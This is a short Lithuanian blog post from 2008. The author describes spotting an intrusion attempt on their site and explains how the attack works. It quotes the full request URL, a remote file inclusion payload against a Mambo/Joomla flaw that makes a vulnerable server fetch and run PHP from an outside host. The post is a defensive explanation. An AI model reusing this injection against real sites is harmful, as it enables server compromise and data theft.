Kartas nuo karto nueinu pasižiūrėti, kas šiuo metu naršo mano bloge. Pasižiūriu iš kur atėjo, kokį puslapį žiūri. Įdomu, kai viskas vyksta „on the fly“.

Dabar ką tik prisijungęs pamačiau, kad žmogus/robotas iš šio IP 72.55.143.52 bando laužtis į šį puslapį. Grečiausiai tai daro koks nors script kiddie, nes įvedus šį IP į google, paieškos rezultatuose išmetami access logai su panašiomis atakomis.

Kaip vykdoma ataka.

Į nuorodą yra įvedama štai tokia eilutė

http://www.sadauskas.lt/index.php/category/kompiuterija/programavimas/php/
index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&
_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=
http://www.pooya.info/images/…/test.txt%3

Iš kintamųjų bandomų perduoti per užklausą spėju, kad bandoma įsibrauti panaudojant kažkokį Mambo/Joomla TVS’o pažeidžiamumą arba tiesiog išnaudoti register_globals on parametrą, jeigu serverio administratorius nekoks specialistas ir palieką jį įjungtą.

Jeigu aš naudočiau Joomla TVS ir serverio parametruose būtų register globals on, tai puslapis įvykdytų PHP kodą, kuris pateiktas šioje nuorodoje http://www.pooya.info/images/…/test.txt

Na, o jeigu jau puslapis jį įvykdytų ir serveris būtų netvarkingai sukonfigūruotas, tai viso gero jūsų duomenims, o gal ir visam serveriui.

Tokių kiber atakų turbūt patiriame kiekvienas, tik dažniausiai jų nepastebime. Būkit atsargūs.

Paskelbta Tuesday, January 29th, 2008 16:48. Priskirta kategorijoms Internetas, Kompiuterija, PHP. Ačiū, kad rašote komentarus, arba paliekate pėdsaką savo svetainėje.